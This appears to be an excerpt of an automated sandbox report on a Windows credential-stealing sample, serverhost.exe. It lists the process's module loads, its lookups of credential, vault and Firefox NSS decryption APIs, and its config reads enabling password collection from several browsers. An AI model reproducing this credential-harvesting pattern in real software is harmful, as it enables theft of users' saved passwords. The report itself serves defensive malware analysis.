Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\sdclt.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\internet explorer\argentina conducting merchandise.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\rundll32.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\sc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\dvd maker\lyrics-morning-effectiveness.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows defender\involved-int-antenna-lol.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\dvd maker\food_logos_lot.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows sidebar\designed.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\chargetrackbacksobserve.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\msbuild\info-began-nobody-tops.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\uninstall information\myers biggest qatar.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\google\invalid.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows nt\panel-maria-suggestion.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows mail\remained universe sole.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\internet explorer\evanescence oscar em.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\reference assemblies\fifth roller.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows sidebar\irish.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft analysis services\advocate-keep.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\distributors.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft.net\lighter.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows sidebar\lease-entitled-pcs.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows media player\nerve-bracelet.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\office15\winword.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module (117)
+
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x6eb50000 True 1
Fn
Load shell32.dll base_address = 0x758a0000 True 1
Fn
Load advapi32.dll base_address = 0x764f0000 True 2
Fn
Load pstorec.dll base_address = 0x71ec0000 True 1
Fn
Load vaultcli.dll base_address = 0x6f4d0000 True 1
Fn
Load C:\Program Files\Mozilla Firefox\nss3.dll base_address = 0x63270000 True 1
Fn
Load psapi.dll base_address = 0x773f0000 True 1
Fn
Get Handle private_0x0000000000400000 base_address = 0x400000 True 22
Fn
Get Handle C:\Program Files\Mozilla Firefox\nss3.dll base_address = 0x0 False 1
Fn
Get Handle c:\program files\mozilla firefox\nss3.dll base_address = 0x63270000 True 2
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x76590000 True 1
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 2
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\taskhost.exe, file_name_orig = C:\Windows\system32\taskhost.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\dwm.exe, file_name_orig = C:\Windows\system32\Dwm.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\explorer.exe, file_name_orig = C:\Windows\Explorer.EXE, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\taskeng.exe, file_name_orig = C:\Windows\system32\taskeng.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\sdclt.exe, file_name_orig = C:\Program Files\Common Files\blowiranlaboratorydisaster.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\internet explorer\argentina conducting merchandise.exe, file_name_orig = C:\Program Files\Internet Explorer\argentina conducting merchandise.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Program Files\Microsoft Analysis Services\output.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\sc.exe, file_name_orig = C:\Program Files\Adobe\bookings.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\dvd maker\lyrics-morning-effectiveness.exe, file_name_orig = C:\Program Files\DVD Maker\lyrics-morning-effectiveness.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows defender\involved-int-antenna-lol.exe, file_name_orig = C:\Program Files\Windows Defender\involved-int-antenna-lol.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\windows\system32\conhost.exe, file_name_orig = C:\Program Files\Microsoft Office\enterprise monsters comments.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\dvd maker\food_logos_lot.exe, file_name_orig = C:\Program Files\DVD Maker\food_logos_lot.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows sidebar\designed.exe, file_name_orig = C:\Program Files\Windows Sidebar\designed.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\microsoft office\chargetrackbacksobserve.exe, file_name_orig = C:\Program Files\Microsoft Office\chargetrackbacksobserve.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\msbuild\info-began-nobody-tops.exe, file_name_orig = C:\Program Files\MSBuild\info-began-nobody-tops.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\uninstall information\myers biggest qatar.exe, file_name_orig = C:\Program Files\Uninstall Information\myers biggest qatar.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\google\invalid.exe, file_name_orig = C:\Program Files\Google\invalid.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows nt\panel-maria-suggestion.exe, file_name_orig = C:\Program Files\Windows NT\panel-maria-suggestion.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows mail\remained universe sole.exe, file_name_orig = C:\Program Files\Windows Mail\remained universe sole.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\internet explorer\evanescence oscar em.exe, file_name_orig = C:\Program Files\Internet Explorer\evanescence oscar em.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\reference assemblies\fifth roller.exe, file_name_orig = C:\Program Files\Reference Assemblies\fifth roller.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows sidebar\irish.exe, file_name_orig = C:\Program Files\Windows Sidebar\irish.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\microsoft analysis services\advocate-keep.exe, file_name_orig = C:\Program Files\Microsoft Analysis Services\advocate-keep.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\microsoft office\distributors.exe, file_name_orig = C:\Program Files\Microsoft Office\distributors.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\microsoft.net\lighter.exe, file_name_orig = C:\Program Files\Microsoft.NET\lighter.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows sidebar\lease-entitled-pcs.exe, file_name_orig = C:\Program Files\Windows Sidebar\lease-entitled-pcs.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\windows media player\nerve-bracelet.exe, file_name_orig = C:\Program Files\Windows Media Player\nerve-bracelet.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Office15\WINWORD.EXE, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Fn
Get Filename C:\Program Files\Mozilla Firefox\nss3.dll process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll function = InitCommonControlsEx, address_out = 0x6eb56be6 True 1
Fn
Get Address c:\windows\system32\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x758c0468 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = CryptAcquireContextA, address_out = 0x764f91dd True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = CryptReleaseContext, address_out = 0x764fe124 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = CryptCreateHash, address_out = 0x764fdf4e True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = CryptGetHashParam, address_out = 0x764fdf7e True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = CryptHashData, address_out = 0x764fdf36 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = CryptDestroyHash, address_out = 0x764fdf66 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = CredReadA, address_out = 0x765371c1 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = CredFree, address_out = 0x764fb2ec True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = CredDeleteA, address_out = 0x76537941 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = CredEnumerateA, address_out = 0x76537381 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = CredEnumerateW, address_out = 0x76537481 True 1
Fn
Get Address c:\windows\system32\pstorec.dll function = PStoreCreateInstance, address_out = 0x71ec526c True 1
Fn
Get Address c:\windows\system32\vaultcli.dll function = VaultOpenVault, address_out = 0x6f4d26a9 True 1
Fn
Get Address c:\windows\system32\vaultcli.dll function = VaultCloseVault, address_out = 0x6f4d2718 True 1
Fn
Get Address c:\windows\system32\vaultcli.dll function = VaultEnumerateItems, address_out = 0x6f4d3099 True 1
Fn
Get Address c:\windows\system32\vaultcli.dll function = VaultFree, address_out = 0x6f4d4321 True 1
Fn
Get Address c:\windows\system32\vaultcli.dll function = VaultGetInformation, address_out = 0x6f4d24c0 True 1
Fn
Get Address c:\windows\system32\vaultcli.dll function = VaultGetItem, address_out = 0x6f4d3242 True 2
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = NSS_Init, address_out = 0x6332d70b True 2
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = NSS_Shutdown, address_out = 0x6332d13c True 2
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = PK11_GetInternalKeySlot, address_out = 0x632c3c51 True 2
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = PK11_FreeSlot, address_out = 0x632c3333 True 2
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = PK11_CheckUserPassword, address_out = 0x632acbc4 True 2
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = PK11_Authenticate, address_out = 0x632ad3ca True 2
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = PK11SDR_Decrypt, address_out = 0x632c00a7 True 2
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_open, address_out = 0x633d1ca0 True 1
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_prepare, address_out = 0x6335ce70 True 1
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_step, address_out = 0x633c5200 True 1
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_column_text, address_out = 0x6337d400 True 1
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_column_int, address_out = 0x6337d3a0 True 1
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_column_int64, address_out = 0x6337d3d0 True 1
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_finalize, address_out = 0x633a9f60 True 1
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_close, address_out = 0x633abde0 True 1
Fn
Get Address c:\program files\mozilla firefox\nss3.dll function = sqlite3_exec, address_out = 0x633aa270 True 1
Fn
Get Address c:\windows\system32\psapi.dll function = GetModuleBaseNameW, address_out = 0x773f152c True 1
Fn
Get Address c:\windows\system32\psapi.dll function = EnumProcessModules, address_out = 0x773f1408 True 1
Fn
Get Address c:\windows\system32\psapi.dll function = GetModuleFileNameExW, address_out = 0x773f13f0 True 1
Fn
Get Address c:\windows\system32\psapi.dll function = EnumProcesses, address_out = 0x773f1544 True 1
Fn
Get Address c:\windows\system32\psapi.dll function = GetModuleInformation, address_out = 0x773f1420 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetProcessTimes, address_out = 0x765cf626 True 1
Fn
System (3)
+
Operation Additional Information Success Count Logfile
Get Info type = Operating System False 2
Fn
Get Info type = Hardware Information True 1
Fn
Ini (28)
+
Operation Filename Additional Information Success Count Logfile
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = ShowInfoTip, default_value = 1 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = ShowTimeInGMT, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsIE, default_value = 1 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsChrome, default_value = 1 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsOpera, default_value = 1 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsSafari, default_value = 1 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = LoadPasswordsYandex, default_value = 1 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = UseChromeProfileFolder, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = UseOperaPasswordFile, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = FirefoxProfileFolder False 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = FirefoxInstallFolder False 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = ChromeProfileFolder False 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = OperaPasswordFile False 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = SaveFileEncoeding, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = WinPos False 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = Columns False 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile0, key_name = Path, data_out = Profiles/zp0p8bce.default True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile0, key_name = IsRelative, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile1, key_name = Path False 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile1, key_name = IsRelative, default_value = 0 True 1
Fn
Process #15: serverhost.exe
(Host: 40, Network: 0)
+
Information Value
ID #15
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:47, Reason: Autostart
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:00:38
OS Process Information
+
Information Value
PID 0x744
Parent PID 0x600 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000ecd9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 748
0x 784
0x 7B0
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False
pagefile_0x00000000000b0000 0x000b0000 0x00177fff Pagefile Backed Memory Readable True False False
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False
pagefile_0x0000000000190000 0x00190000 0x00196fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x001d0000 0x001d0fff Memory Mapped File Readable False False False
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable True False False
private_0x00000000001d0000 0x001d0000 0x001d0fff Private Memory Readable, Writable True False False
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable True False False
private_0x00000000001f0000 0x001f0000 0x002effff Private Memory Readable, Writable True False False
pagefile_0x00000000002f0000 0x002f0000 0x003f0fff Pagefile Backed Memory Readable True False False
rpcss.dll 0x00400000 0x0045bfff Memory Mapped File Readable False False False
rpcss.dll 0x00400000 0x0045bfff Memory Mapped File Readable False False False
pagefile_0x0000000000400000 0x00400000 0x00400fff Pagefile Backed Memory Readable True False False
cversions.1.db 0x00410000 0x00413fff Memory Mapped File Readable True False False
private_0x0000000000410000 0x00410000 0x00418fff Private Memory Readable, Writable True False False
private_0x0000000000410000 0x00410000 0x0041cfff Private Memory Readable, Writable, Executable True False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db 0x00420000 0x0043cfff Memory Mapped File Readable True False False
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000450000 0x00450000 0x00473fff Private Memory Readable, Writable True False False
private_0x0000000000450000 0x00450000 0x00461fff Private Memory Readable, Writable True False False
private_0x0000000000470000 0x00470000 0x00481fff Private Memory Readable, Writable True False False
private_0x0000000000480000 0x00480000 0x00488fff Private Memory Readable, Writable True False False
private_0x0000000000490000 0x00490000 0x0058ffff Private Memory Readable, Writable True False False
private_0x0000000000590000 0x00590000 0x005b3fff Private Memory Readable, Writable True False False
private_0x0000000000590000 0x00590000 0x005a1fff Private Memory Readable, Writable True False False
private_0x00000000005b0000 0x005b0000 0x005bcfff Private Memory Readable, Writable True False False
private_0x00000000005d0000 0x005d0000 0x006cffff Private Memory Readable, Writable True False False
private_0x00000000006d0000 0x006d0000 0x00717fff Private Memory Readable, Writable True False False
private_0x0000000000720000 0x00720000 0x0072ffff Private Memory Readable, Writable True False False
private_0x0000000000750000 0x00750000 0x0075ffff Private Memory Readable, Writable True False False
private_0x0000000000760000 0x00760000 0x008affff Private Memory Readable, Writable True False False
pagefile_0x0000000000760000 0x00760000 0x0083efff Pagefile Backed Memory Readable True False False
private_0x0000000000870000 0x00870000 0x008affff Private Memory Readable, Writable True False False
private_0x00000000008b0000 0x008b0000 0x009affff Private Memory Readable, Writable True False False
serverhost.exe 0x009e0000 0x009fafff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000a00000 0x00a00000 0x015fffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001600000 0x01600000 0x019f2fff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01a00000 0x01ccefff Memory Mapped File Readable False False False
private_0x0000000001cd0000 0x01cd0000 0x01d17fff Private Memory Readable, Writable True False False
private_0x0000000001e30000 0x01e30000 0x01f2ffff Private Memory Readable, Writable True False False
imageres.dll 0x6d1b0000 0x6e505fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x711a0000 0x711ebfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x71b80000 0x71c03fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x71c90000 0x72fe5fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x73790000 0x737b0fff Memory Mapped File Readable, Writable, Executable False False False
windowscodecs.dll 0x73a40000 0x73b3afff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x73ea0000 0x73edffff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x73ee0000 0x73fd4fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x74020000 0x741bdfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74f70000 0x74f8afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74f90000 0x74f9bfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x75040000 0x7504afff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x75150000 0x75161fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x751a0000 0x751e9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x75310000 0x75336fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x75340000 0x753dffff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x753e0000 0x7546efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x754a0000 0x754e4fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x754f0000 0x75590fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x756a0000 0x7573cfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75740000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76390000 0x7645bfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76500000 0x765d3fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x767e0000 0x767fefff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x76800000 0x7695bfff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x76970000 0x769f2fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76bc0000 0x76bc9fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76bd0000 0x76c98fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x76ca0000 0x76e3cfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76e40000 0x76eebfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x76ef0000 0x7702bfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x77030000 0x77048fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x77060000 0x770b6fff Memory Mapped File Readable, Writable, Executable False False False
